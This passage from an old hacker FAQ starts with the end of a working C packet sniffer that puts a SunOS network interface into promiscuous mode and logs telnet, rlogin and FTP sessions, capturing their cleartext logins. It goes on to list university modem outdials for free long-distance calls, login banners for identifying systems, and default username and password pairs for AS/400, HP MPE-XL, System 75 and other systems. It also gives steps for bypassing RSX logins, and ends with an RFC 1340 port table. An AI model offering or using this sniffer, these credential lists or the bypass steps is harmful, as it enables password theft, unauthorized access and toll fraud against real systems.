  944.         IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) )
  945.             break;
  946.     CLr = CLr->Next;
  947.   }
  948.   return(CLr);
  949. }
  950.  
  951. #define ADDDATA_NODE(CL,DATA,LEN) { \
  952.  bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \
  953.  CL->Length += LEN; \
  954. }
  955.  
  956. #define PR_DATA(dp,ln) {    \
  957.   register u_char lastc=0; \
  958.   while(ln-- >0) { \
  959.      if(*dp < 32) {  \
  960.         switch(*dp) { \
  961.             case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \
  962.                         break; \
  963.             case '\r': \
  964.             case '\n': fprintf(LOG,"\n     : "); \
  965.                         break; \
  966.             default  : fprintf(LOG,"^%c", (*dp + 64)); \
  967.                         break; \
  968.         } \
  969.      } else { \
  970.         if(isprint(*dp)) fputc(*dp,LOG); \
  971.         else fprintf(LOG,"(%d)",*dp); \
  972.      } \
  973.      lastc = *dp++; \
  974.   } \
  975.   fflush(LOG); \
  976. }
  977.  
  978. void END_NODE(CLe,d,dl,msg)
  979. register struct CREC *CLe;
  980. register u_char *d;
  981. register int dl;
  982. register char *msg;
  983. {
  984.    fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time));
  985.    fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport));
  986.    fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport));
  987.    fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n",
  988.                         NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg);
  989.    fprintf(LOG," DATA: ");
  990.     { register u_int i = CLe->Length;
  991.       register u_char *p = CLe->Data;
  992.       PR_DATA(p,i);
  993.       PR_DATA(d,dl);
  994.     }
  995.  
  996.    fprintf(LOG,"\n-- \n");
  997.    fflush(LOG);
  998.  
  999.    if(CLe->Next != NULL)
  1000.     CLe->Next->Last = CLe->Last;
  1001.    if(CLe->Last != NULL)
  1002.     CLe->Last->Next = CLe->Next;
  1003.    else
  1004.     CLroot = CLe->Next;
  1005.    free(CLe);
  1006. }
  1007.  
  1008. /* 30 mins (x 60 seconds) */
  1009. #define IDLE_TIMEOUT 1800
  1010. #define IDLE_NODE() { \
  1011.   time_t tm; \
  1012.   time(&tm); \
  1013.   if(LastTIME<tm) { \
  1014.      register struct CREC *CLe,*CLt = CLroot; \
  1015.      LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; \
  1016.      while(CLe=CLt) { \
  1017.        CLt=CLe->Next; \
  1018.        if(CLe->Time <tm) \
  1019.            END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT"); \
  1020.      } \
  1021.   } \
  1022. }
  1023.  
  1024. void filter(cp, pktlen)
  1025. register char *cp;
  1026. register u_int pktlen;
  1027. {
  1028.  register struct ip     *ip;
  1029.  register struct tcphdr *tcph;
  1030.  
  1031.  { register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type);
  1032.  
  1033.    if(EtherType < 0x600) {
  1034.      EtherType = *(u_short *)(cp + SZETH + 6);
  1035.      cp+=8; pktlen-=8;
  1036.    }
  1037.  
  1038.    if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */
  1039.       return;
  1040.  }
  1041.  
  1042.     /* ugh, gotta do an alignment :-( */
  1043.  bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH));
  1044.  
  1045.  ip = (struct ip *)Packet;
  1046.  if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */
  1047.     return;
  1048.  tcph = (struct tcphdr *)(Packet + IPHLEN);
  1049.  
  1050.  if(!( (TCPD == IPPORT_TELNET) ||
  1051.        (TCPD == IPPORT_LOGINSERVER) ||
  1052.        (TCPD == IPPORT_FTP)
  1053.    )) return;
  1054.  
  1055.  { register struct CREC *CLm;
  1056.    register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4));
  1057.    register u_char *p = (u_char *)Packet;
  1058.  
  1059.    p += ((IPHLEN * 4) + (TCPOFF * 4));
  1060.  
  1061.  if(debug) {
  1062.   fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length);
  1063.   fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS));
  1064.   fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD));
  1065.  }
  1066.  
  1067.    if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) {
  1068.  
  1069.       CLm->PKcnt++;
  1070.  
  1071.       if(length>0)
  1072.         if( (CLm->Length + length) < MAXBUFLEN ) {
  1073.           ADDDATA_NODE( CLm, p,length);
  1074.         } else {
  1075.           END_NODE( CLm, p,length, "DATA LIMIT");
  1076.         }
  1077.  
  1078.       if(TCPFL(TH_FIN|TH_RST)) {
  1079.           END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" );
  1080.       }
  1081.  
  1082.    } else {
  1083.  
  1084.       if(TCPFL(TH_SYN)) {
  1085.          ADD_NODE(IPS,IPD,TCPS,TCPD,p,length);
  1086.       }
  1087.  
  1088.    }
  1089.  
  1090.    IDLE_NODE();
  1091.  
  1092.  }
  1093.  
  1094. }
  1095.  
  1096. /* signal handler
  1097.  */
  1098. void death()
  1099. { register struct CREC *CLe;
  1100.  
  1101.     while(CLe=CLroot)
  1102.         END_NODE( CLe, (u_char *)NULL,0, "SIGNAL");
  1103.  
  1104.     fprintf(LOG,"\nLog ended at => %s\n",NOWtm());
  1105.     fflush(LOG);
  1106.     if(LOG != stdout)
  1107.         fclose(LOG);
  1108.     exit(1);
  1109. }
  1110.  
  1111. /* opens network interface, performs ioctls and reads from it,
  1112.  * passing data to filter function
  1113.  */
  1114. void do_it()
  1115. {
  1116.     int cc;
  1117.     char *buf;
  1118.     u_short sp_ts_len;
  1119.  
  1120.     if(!(buf=malloc(CHUNKSIZE)))
  1121.         Pexit(1,"Eth: malloc");
  1122.  
  1123. /* this /dev/nit initialization code pinched from etherfind */
  1124.   {
  1125.     struct strioctl si;
  1126.     struct ifreq    ifr;
  1127.     struct timeval  timeout;
  1128.     u_int  chunksize = CHUNKSIZE;
  1129.     u_long if_flags  = NI_PROMISC;
  1130.  
  1131.     if((if_fd = open(NIT_DEV, O_RDONLY)) < 0)
  1132.         Pexit(1,"Eth: nit open");
  1133.  
  1134.     if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0)
  1135.         Pexit(1,"Eth: ioctl (I_SRDOPT)");
  1136.  
  1137.     si.ic_timout = INFTIM;
  1138.  
  1139.     if(ioctl(if_fd, I_PUSH, "nbuf") < 0)
  1140.         Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")");
  1141.  
  1142.     timeout.tv_sec = 1;
  1143.     timeout.tv_usec = 0;
  1144.     si.ic_cmd = NIOCSTIME;
  1145.     si.ic_len = sizeof(timeout);
  1146.     si.ic_dp  = (char *)&timeout;
  1147.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  1148.         Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)");
  1149.  
  1150.     si.ic_cmd = NIOCSCHUNK;
  1151.     si.ic_len = sizeof(chunksize);
  1152.     si.ic_dp  = (char *)&chunksize;
  1153.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  1154.         Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)");
  1155.  
  1156.     strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));
  1157.     ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0';
  1158.     si.ic_cmd = NIOCBIND;
  1159.     si.ic_len = sizeof(ifr);
  1160.     si.ic_dp  = (char *)𝔦
  1161.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  1162.         Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)");
  1163.  
  1164.     si.ic_cmd = NIOCSFLAGS;
  1165.     si.ic_len = sizeof(if_flags);
  1166.     si.ic_dp  = (char *)&if_flags;
  1167.     if(ioctl(if_fd, I_STR, (char *)&si) < 0)
  1168.         Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)");
  1169.  
  1170.     if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0)
  1171.         Pexit(1,"Eth: ioctl (I_FLUSH)");
  1172.   }
  1173.  
  1174.     while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) {
  1175.         register char *bp = buf,
  1176.                       *bufstop = (buf + cc);
  1177.  
  1178.         while (bp < bufstop) {
  1179.             register char *cp = bp;
  1180.             register struct nit_bufhdr *hdrp;
  1181.  
  1182.             hdrp = (struct nit_bufhdr *)cp;
  1183.             cp += sizeof(struct nit_bufhdr);
  1184.             bp += hdrp->nhb_totlen;
  1185.             filter(cp, (u_long)hdrp->nhb_msglen);
  1186.         }
  1187.     }
  1188.     Pexit((-1),"Eth: read");
  1189. }
  1190.  /* Authorize your proogie,generate your own password and uncomment here */
  1191. /* #define AUTHPASSWD "EloiZgZejWyms" */
  1192.  
  1193. void getauth()
  1194. { char *buf,*getpass(),*crypt();
  1195.   char pwd[21],prmpt[81];
  1196.  
  1197.     strcpy(pwd,AUTHPASSWD);
  1198.     sprintf(prmpt,"(%s)UP? ",ProgName);
  1199.     buf=getpass(prmpt);
  1200.     if(strcmp(pwd,crypt(buf,pwd)))
  1201.         exit(1);
  1202. }
  1203.     */
  1204. void main(argc, argv)
  1205. int argc;
  1206. char **argv;
  1207. {
  1208.     char   cbuf[BUFSIZ];
  1209.     struct ifconf ifc;
  1210.     int    s,
  1211.            ac=1,
  1212.            backg=0;
  1213.  
  1214.     ProgName=argv[0];
  1215.  
  1216.  /*     getauth(); */
  1217.  
  1218.     LOG=NULL;
  1219.     device=NULL;
  1220.     while((ac<argc) && (argv[ac][0] == '-')) {
  1221.        register char ch = argv[ac++][1];
  1222.        switch(toupper(ch)) {
  1223.             case 'I': device=argv[ac++];
  1224.                       break;
  1225.             case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"a")))
  1226.                          Zexit(1,"Output file cant be opened\n");
  1227.                       break;
  1228.             case 'B': backg=1;
  1229.                       break;
  1230.             case 'D': debug=1;
  1231.                       break;
  1232.             default : fprintf(ERR,
  1233.                         "Usage: %s [-b] [-d] [-i interface] [-f file]\n",
  1234.                             ProgName);
  1235.                       exit(1);
  1236.        }
  1237.     }
  1238.  
  1239.     if(!device) {
  1240.         if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0)
  1241.             Pexit(1,"Eth: socket");
  1242.  
  1243.         ifc.ifc_len = sizeof(cbuf);
  1244.         ifc.ifc_buf = cbuf;
  1245.         if(ioctl(s, SIOCGIFCONF, (char *)&ifc) < 0)
  1246.             Pexit(1,"Eth: ioctl");
  1247.  
  1248.         close(s);
  1249.         device = ifc.ifc_req->ifr_name;
  1250.     }
  1251.  
  1252.     fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV);
  1253.     fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout",
  1254.             (debug)?" (debug)":"",(backg)?" Backgrounding ":"\n");
  1255.  
  1256.     if(!LOG)
  1257.         LOG=stdout;
  1258.  
  1259.     signal(SIGINT, death);
  1260.     signal(SIGTERM,death);
  1261.     signal(SIGKILL,death);
  1262.     signal(SIGQUIT,death);
  1263.  
  1264.     if(backg && debug) {
  1265.          fprintf(ERR,"[Cannot bg with debug on]\n");
  1266.          backg=0;
  1267.     }
  1268.  
  1269.     if(backg) {
  1270.         register int s;
  1271.  
  1272.         if((s=fork())>0) {
  1273.            fprintf(ERR,"[pid %d]\n",s);
  1274.            exit(0);
  1275.         } else if(s<0)
  1276.            Pexit(1,"fork");
  1277.  
  1278.         if( (s=open("/dev/tty",O_RDWR))>0 ) {
  1279.                 ioctl(s,TIOCNOTTY,(char *)NULL);
  1280.                 close(s);
  1281.         }
  1282.     }
  1283.     fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid());
  1284.     fflush(LOG);
  1285.  
  1286.     do_it();
  1287. }
  1288.  
  1289.  
  1290. 18. What is an Internet Outdial?
  1291.  
  1292. An Internet outdial is a modem connected to the Internet than you can
  1293. use to dial out.  Normal outdials will only call local numbers.  A GOD
  1294. (Global OutDial) is capable of calling long distance.  Outdials are an
  1295. inexpensive method of calling long distance BBS's.
  1296.  
  1297.  
  1298. 19. What are some Internet Outdials?
  1299.  
  1300.  
  1301. Area    Address(s)                      Command(s)
  1302. ------  ------------------------------- ---------------------
  1303. 201     128.112.88.0
  1304.     128.112.88.1
  1305.     128.112.88.2
  1306.     128.112.88.3
  1307. 204     umnet.cc.manitoba.ca            "dial12" or "dial24"
  1308. 206     dialout24.cac.washington.edu
  1309. 215     wiseowl.ocis.temple.edu         atz
  1310.                     atdt 9xxxyyyy
  1311.     129.72.1.59                     hayes compat
  1312. 218     aa28.d.umn.edu                  cli
  1313.                     rlogin modem
  1314.                     at "login:" type 
  1315.                     "modem"
  1316.     modem.d.umn.edu                 "Hayes"
  1317. 232     isn.rdns.iastate.edu            MODEM              [Works!!]
  1318.                     atz 
  1319.                     atdt8xxx-xxxx
  1320. 303     129.82.100.64                   login: modem       [need password!]
  1321. 307     modem.uwyo.edu
  1322.     129.72.1.59                     hayes compat
  1323. 313     35.1.1.6                        "dial2400-aa" or   [can't connect]
  1324.                     "dial1200-aa"
  1325. 315     198.36.22.3                     "modem"
  1326. 404     emory.edu                       .modem8 or
  1327.                     .dialout
  1328.     broadband.cc.emory.edu          .modem8 or
  1329.                     .dialout
  1330.     128.140.1.239                   .modem8|CR
  1331.                     or .modem96|CR
  1332. 412     gate.cis.pitt.edu               LAT
  1333.                     connect dialout
  1334.                     ^E
  1335.                     atdt 91k xxx-xxxx
  1336. 415     128.32.132.250                  "dial1" or "dial2"
  1337. 416     pacx.utcs.utoronto.ca           modem
  1338.                     atdt 9xxx-xxxx
  1339. 502     uknet.uky.edu                   outdial2400
  1340.                     atdt 9xxx-xxxx
  1341. 510     annex132-1.eecs.berkeley.edu    atdt 9,,,,, xxx-xxxx
  1342. 514     132.204.2.11                    externe#9 9xxx-xxxx
  1343. 515     isn.rdns.iastate.edu            login MODEM 
  1344.                     dial atdt8xxx-yyyy
  1345. 602     129.219.17.3                    atdt8,,,,,xyyyxxxyyyy
  1346.     129.219.17.3                    login: MODEM
  1347.                     atdt 8xxx-xxxx
  1348. 609     129.72.1.59                     "Hayes"
  1349.     128.119.131.110                 "Hayes"
  1350.     128.119.131.111         
  1351.     128.119.131.112
  1352.     128.119.131.113
  1353.     128.119.131.114
  1354.     128.112.131.110
  1355.     128.112.131.111
  1356.     128.112.131.112
  1357.     128.112.131.113
  1358.     128.112.131.114                 the above are hayes
  1359. 614     ns2400.ircc.ohio-state.edu      DIAL               [can't connect]
  1360. 615     dca.utk.edu                     "dial2400"
  1361. 617     dialout.lcs.mit.edu
  1362. 619     dialin.ucsd.edu                 "dialout"
  1363.     128.54.30.1                     nue
  1364. 713     128.143.70.101                  "connect hayes"
  1365.     128.249.27.154                  c modem96
  1366.                     atdt 9xxx-xxxx
  1367.     128.249.27.153                  " -+ as above +- "
  1368.     modem24.bcm.tmc.edu
  1369.     modem12.bcm.tmc.edu
  1370. 714     130.191.4.70                    atdt 8xxx-xxxx
  1371. 804     ublan.acc.virginia.edu          c hayes
  1372.     128.143.70.101                  connect hayes
  1373.                     atdt xxx-xxxx
  1374. 902     star.ccs.tuns.ca                "dialout"          [down...]
  1375. 916     128.120.2.251                   "dialout"          [down...]
  1376.     129.137.33.72                                      [can't connect]
  1377. ???     dialout1.princeton.edu                             [can't connect]
  1378.     dswitch.byu.edu                 "C Modem"          [can't connect]
  1379.     modem.cis.uflu.edu                                 [can't connect]
  1380.     r596adi1.uc.edu                                    [can't connect]
  1381.     vtnet1.cns.ut.edu               "CALL" or "call"   [can't connect]
  1382.     18.26.0.55                                         [can't connect]
  1383.     128.173.5.4                                        [need password!]
  1384.     128.187.1.2                                        [need password!]
  1385.     129.137.33.71                                      [can't connect]
  1386.     bstorm.bga.com / port=4000                         [what is this?]
  1387.  
  1388.  
  1389.  
  1390. 20. What is this system?
  1391.  
  1392.  
  1393. AIX
  1394. ~~~
  1395. IBM AIX Version 3 for RISC System/6000
  1396. (C) Copyrights by IBM and by others 1982, 1990.
  1397. login:
  1398.  
  1399. [You will know an AIX system because it is the only Unix system that]
  1400. [clears the screen and issues a login prompt near the bottom of the]
  1401. [screen]
  1402.  
  1403.  
  1404. AS/400
  1405. ~~~~~~
  1406. UserID?
  1407. Password?
  1408.  
  1409. Once in, type GO MAIN
  1410.  
  1411.  
  1412. CDC Cyber
  1413. ~~~~~~~~~
  1414. WELCOME TO THE NOS SOFTWARE SYSTEM.
  1415. COPYRIGHT CONTROL DATA 1978, 1987.
  1416.  
  1417. 88/02/16. 02.36.53. N265100
  1418. CSUS CYBER 170-730.                     NOS 2.5.2-678/3.
  1419. FAMILY:
  1420.  
  1421. You would normally just hit return at the family prompt.  Next prompt is:
  1422.  
  1423. USER NAME:
  1424.  
  1425.  
  1426. CISCO Router
  1427. ~~~~~~~~~~~~
  1428.                              FIRST BANK OF TNO
  1429.                            95-866 TNO VirtualBank
  1430.                           REMOTE Router -  TN043R1
  1431.  
  1432.                                 Console Port
  1433.  
  1434.                                 SN - 00000866
  1435.  
  1436. TN043R1>
  1437.  
  1438.  
  1439. DECserver
  1440. ~~~~~~~~~
  1441. DECserver 700-08 Communications Server V1.1 (BL44G-11A) - LAT V5.1
  1442. DPS502-DS700
  1443.  
  1444. (c) Copyright 1992, Digital Equipment Corporation - All Rights Reserved
  1445.  
  1446. Please type HELP if you need assistance
  1447.  
  1448. Enter username> TNO
  1449.  
  1450. Local>
  1451.  
  1452.  
  1453. Hewlett Packard MPE-XL
  1454. ~~~~~~~~~~~~~~~~~~~~~~
  1455. MPE XL:
  1456. EXPECTED A :HELLO COMMAND. (CIERR 6057)
  1457. MPE XL:
  1458. EXPECTED [SESSION NAME,] USER.ACCT [,GROUP]   (CIERR 1424)
  1459. MPE XL:
  1460.  
  1461.  
  1462. GTN
  1463. ~~~
  1464. WELCOME TO CITIBANK. PLEASE SIGN ON.
  1465. XXXXXXXX
  1466.  
  1467. @
  1468. PASSWORD =
  1469.  
  1470. @
  1471.  
  1472. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  1473.  
  1474. PLEASE ENTER YOUR ID:-1->
  1475. PLEASE ENTER YOUR PASSWORD:-2->
  1476.  
  1477. CITICORP (CITY NAME). KEY GHELP FOR HELP.
  1478.   XXX.XXX
  1479.  PLEASE SELECT SERVICE REQUIRED.-3->
  1480.  
  1481.  
  1482. Lantronix Terminal Server
  1483. ~~~~~~~~~~~~~~~~~~~~~~~~~
  1484. Lantronix ETS16 Version V3.1/1(940623)
  1485.  
  1486. Type HELP at the 'Local_15> ' prompt for assistance.
  1487.  
  1488. Login password>
  1489.  
  1490.  
  1491. Meridian Mail (Northern Telecom Phone/Voice Mail System)
  1492. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1493.                             MMM       MMMERIDIAN
  1494.                            MMMMM     MMMMM
  1495.                          MMMMMM   MMMMMM
  1496.                         MMM  MMMMM  MMM     MMMMM     MMMMM
  1497.                       MMM   MMM   MMM     MMMMMM   MMMMMM
  1498.                      MMM         MMM     MMM MMM MMM MMM
  1499.                     MMM         MMM     MMM  MMMMM  MMM
  1500.                    MMM         MMM     MMM   MMM   MMM
  1501.                   MMM         MMM     MMM         MMM
  1502.                  MMM         MMM     MMM         MMM
  1503.                 MMM         MMM     MMM         MMM
  1504.                MMM         MMM     MMM         MMM
  1505.               MMM         MMM     MMM         MMM
  1506.  
  1507.                                           Copyright (c) Northern Telecom, 1991
  1508.  
  1509.  
  1510. Novell ONLAN
  1511. ~~~~~~~~~~~~
  1512. N
  1513.  
  1514. [To access the systems it is best to own a copy of ONLAN/PC]
  1515.  
  1516.  
  1517. PC-Anywhere
  1518. ~~~~~~~~~~~
  1519. P
  1520.  
  1521. [To access the systems it is best to own a copy of PCAnywhere Remote]
  1522.  
  1523.  
  1524. PRIMOS
  1525. ~~~~~~
  1526. PRIMENET 19.2.7F PPOA1
  1527.  
  1528. <any text>
  1529.  
  1530. ER!
  1531.  
  1532. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
  1533.  
  1534. CONNECT
  1535. Primenet V 2.3  (system)
  1536. LOGIN           (you)
  1537. User id?        (system)
  1538. SAPB5           (you)
  1539. Password?       (system)
  1540. DROWSAP         (you)
  1541. OK,             (system)
  1542.  
  1543.  
  1544. ROLM-OSL
  1545. ~~~~~~~~
  1546. MARAUDER10292  01/09/85(^G) 1 03/10/87  00:29:47
  1547. RELEASE 8003
  1548. OSL, PLEASE.
  1549. ?
  1550.  
  1551.  
  1552. System75
  1553. ~~~~~~~~
  1554. Login: root
  1555. INCORRECT LOGIN
  1556.  
  1557. Login: browse
  1558. Password:
  1559.  
  1560. Software Version: G3s.b16.2.2
  1561.  
  1562. Terminal Type (513, 4410, 4425): [513]
  1563.  
  1564.  
  1565. Tops-10
  1566. ~~~~~~~
  1567. NIH Timesharing
  1568.  
  1569. NIH Tri-SMP 7.02-FF  16:30:04 TTY11
  1570. system 1378/1381/1453 Connected to Node Happy(40) Line # 12
  1571. Please LOGIN
  1572. .
  1573.  
  1574.  
  1575. VM/370
  1576. ~~~~~~
  1577. VM/370
  1578. !
  1579.  
  1580.  
  1581. VM/ESA
  1582. ~~~~~~
  1583. VM/ESA ONLINE
  1584.  
  1585.                                           TBVM2 VM/ESA Rel 1.1     PUT 9200
  1586.  
  1587. Fill in your USERID and PASSWORD and press ENTER
  1588. (Your password will not appear when you type it)
  1589. USERID   ===>
  1590. PASSWORD ===>
  1591.  
  1592. COMMAND  ===>
  1593.  
  1594.  
  1595. Xylogics Annex Communications Server
  1596. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  1597. Annex Command Line Interpreter   *   Copyright 1991 Xylogics, Inc.
  1598.  
  1599. Checking authorization, Please wait...
  1600. Annex username: TNO
  1601. Annex password:
  1602.  
  1603. Permission granted
  1604. annex:
  1605.  
  1606.  
  1607. 21. What are the default accounts for XXX?
  1608.  
  1609. AIX
  1610. ~~~
  1611. guest           guest
  1612.  
  1613.  
  1614. AS/400
  1615. ~~~~~~
  1616. qsecofr         qsecofr         /* master security officer */
  1617. qsysopr         qsysopr         /* system operator         */
  1618. qpgmr           qpgmr           /* default programmer      */
  1619.  
  1620. also
  1621.  
  1622. ibm/password
  1623. ibm/2222
  1624. ibm/service
  1625. qsecofr/1111111
  1626. qsecofr/2222222
  1627. qsvr/qsvr
  1628. secofr/secofr
  1629.  
  1630.  
  1631. DECserver
  1632. ~~~~~~~~~
  1633. ACCESS
  1634. SYSTEM
  1635.  
  1636.  
  1637. Hewlett Packard MPE-XL
  1638. ~~~~~~~~~~~~~~~~~~~~~~
  1639. HELLO           MANAGER.SYS
  1640. HELLO           MGR.SYS
  1641. HELLO           FIELD.SUPPORT     HPUNSUP or SUPPORT or HP
  1642. HELLO           OP.OPERATOR
  1643. MGR             CAROLIAN
  1644. MGR             CCC
  1645. MGR             CNAS
  1646. MGR             CONV
  1647. MGR             COGNOS
  1648. OPERATOR        COGNOS
  1649. MANAGER         COGNOS
  1650. OPERATOR        DISC
  1651. MGR             HPDESK
  1652. MGR             HPWORD
  1653. FIELD           HPWORD
  1654. MGR             HPOFFICE
  1655. SPOOLMAN        HPOFFICE
  1656. ADVMAIL         HPOFFICE
  1657. MAIL            HPOFFICE
  1658. WP              HPOFFICE
  1659. MANAGER         HPOFFICE
  1660. MGR             HPONLY
  1661. FIELD           HPP187
  1662. MGR             HPP187
  1663. MGR             HPP189
  1664. MGR             HPP196
  1665. MGR             INTX3
  1666. MGR             ITF3000
  1667. MANAGER         ITF3000
  1668. MAIL            MAIL
  1669. MGR             NETBASE
  1670. MGR             REGO
  1671. MGR             RJE
  1672. MGR             ROBELLE
  1673. MANAGER         SECURITY
  1674. MGR             SECURITY
  1675. FIELD           SERVICE
  1676. MANAGER         SYS
  1677. MGR             SYS
  1678. PCUSER          SYS
  1679. RSBCMON         SYS
  1680. OPERATOR        SYS
  1681. OPERATOR        SYSTEM
  1682. FIELD           SUPPORT
  1683. OPERATOR        SUPPORT
  1684. MANAGER         TCH
  1685. MAIL            TELESUP
  1686. MANAGER         TELESUP
  1687. MGR             TELESUP
  1688. SYS             TELESUP
  1689. MGE             VESOFT
  1690. MGE             VESOFT
  1691. MGR             WORD
  1692. MGR             XLSERVER
  1693.  
  1694. Common jobs are Pub, Sys, Data
  1695. Common passwords are HPOnly, TeleSup, HP, MPE, Manager, MGR, Remote
  1696.  
  1697.  
  1698. Major BBS
  1699. ~~~~~~~~~
  1700. Sysop           Sysop
  1701.  
  1702.  
  1703. PICK O/S
  1704. ~~~~~~~~
  1705. DSA             # Desquetop System Administrator
  1706. DS
  1707. DESQUETOP
  1708. PHANTOM
  1709.  
  1710.  
  1711. Prolog
  1712. ~~~~~~
  1713. PBX             PBX
  1714. NETWORK         NETWORK
  1715. NETOP           <null>
  1716.  
  1717.  
  1718. Rolm
  1719. ~~~~
  1720. CBX Defaults
  1721.  
  1722. op              op
  1723. op              operator
  1724. su              super
  1725. admin           pwp
  1726. eng             engineer
  1727.  
  1728.  
  1729. PhoneMail Defaults
  1730.  
  1731. sysadmin        sysadmin
  1732. tech            tech
  1733. poll            tech
  1734.  
  1735.  
  1736. RSX
  1737. ~~~
  1738. SYSTEM/SYSTEM   (Username SYSTEM, Password SYSTEM)
  1739. 1,1/system      (Directory [1,1] Password SYSTEM)
  1740. BATCH/BATCH
  1741. SYSTEM/MANAGER
  1742. USER/USER
  1743.  
  1744. Default accounts for Micro/RSX:
  1745.  
  1746.         MICRO/RSX
  1747.  
  1748. Alternately you can hit <CTRL-Z>  when the boot sequence asks you for the
  1749. date and create an account using:
  1750.  
  1751.         RUN ACNT
  1752.         or  RUN $ACNT
  1753.  
  1754. (Numbers below 10 {oct} are Priveleged)
  1755.  
  1756. Reboot and wait for the date/time question. Type ^C and at the MCR prompt,
  1757. type "abo at." You must include the . dot!
  1758.  
  1759. If this works, type "acs lb0:/blks=1000" to get some swap space so the
  1760. new step won't wedge.
  1761.  
  1762. type " run $acnt" and change the password of any account with a group
  1763. number of 7 or less.
  1764.  
  1765. You may find that the ^C does not work. Try ^Z and ESC as well.
  1766. Also try all 3 as terminators to valid and invalid times.
  1767.  
  1768. If none of the above work, use the halt switch to halt the system,
  1769. just after a invalid date-time.  Look for a user mode PSW 1[4-7]xxxx.
  1770. then deposit 177777 into R6, cross your fingers, write protect the drive
  1771. and continue the system.  This will hopefully result in indirect blowing
  1772. up...  And hopefully the system has not been fully secured.
  1773.  
  1774.  
  1775. System 75
  1776. ~~~~~~~~~
  1777. bcim            bcimpw
  1778. bciim           bciimpw
  1779. bcms            bcmspw, bcms
  1780. bcnas           bcnspw
  1781. blue            bluepw
  1782. browse          looker, browsepw
  1783. craft           crftpw, craftpw, crack
  1784. cust            custpw
  1785. enquiry         enquirypw
  1786. field           support
  1787. inads           indspw, inadspw, inads
  1788. init            initpw
  1789. kraft           kraftpw
  1790. locate          locatepw
  1791. maint           maintpw, rwmaint
  1792. nms             nmspw
  1793. rcust           rcustpw
  1794. support         supportpw
  1795. tech            field
  1796.  
  1797.  
  1798. Taco Bell
  1799. ~~~~~~~~~
  1800. rgm             rollout
  1801. tacobell        <null>
  1802.  
  1803.           
  1804. Verifone Junior 2.05
  1805. ~~~~~~~~~~~~~~~~~~~~
  1806. Default password: 166816
  1807.  
  1808.  
  1809. VMS
  1810. ~~~
  1811. field           service
  1812. systest         utep
  1813.  
  1814.  
  1815. 22. What port is XXX on?
  1816.  
  1817. The file /etc/services on most Unix machines lists the activity
  1818. occurring on each port.  Here is the most complete port list in
  1819. existence, originally presented in RFC 1340:
  1820.  
  1821. Keyword         Decimal    Description
  1822. -------         -------    -----------
  1823.                   0/tcp    Reserved
  1824.                   0/udp    Reserved
  1825. tcpmux            1/tcp    TCP Port Service Multiplexer
  1826. tcpmux            1/udp    TCP Port Service Multiplexer
  1827. compressnet       2/tcp    Management Utility
  1828. compressnet       2/udp    Management Utility
  1829. compressnet       3/tcp    Compression Process
  1830. compressnet       3/udp    Compression Process
  1831.                   4/tcp    Unassigned
  1832.                   4/udp    Unassigned
  1833. rje               5/tcp    Remote Job Entry
  1834. rje               5/udp    Remote Job Entry
  1835.                   6/tcp    Unassigned
  1836.                   6/udp    Unassigned
  1837. echo              7/tcp    Echo
  1838. echo              7/udp    Echo
  1839.                   8/tcp    Unassigned
  1840.                   8/udp    Unassigned
  1841. discard           9/tcp    Discard
  1842. discard           9/udp    Discard
  1843.                  10/tcp    Unassigned
  1844.                  10/udp    Unassigned
  1845. systat           11/tcp    Active Users
  1846. systat           11/udp    Active Users
  1847.                  12/tcp    Unassigned
  1848.                  12/udp    Unassigned
  1849. daytime          13/tcp    Daytime
  1850. daytime          13/udp    Daytime
  1851.                  14/tcp    Unassigned
  1852.                  14/udp    Unassigned
  1853.                  15/tcp    Unassigned [was netstat]
  1854.                  15/udp    Unassigned
  1855.                  16/tcp    Unassigned
  1856.                  16/udp    Unassigned
  1857. qotd             17/tcp    Quote of the Day
  1858. qotd             17/udp    Quote of the Day
  1859. msp              18/tcp    Message Send Protocol
  1860. msp              18/udp    Message Send Protocol
  1861. chargen          19/tcp    Character Generator
  1862. chargen          19/udp    Character Generator
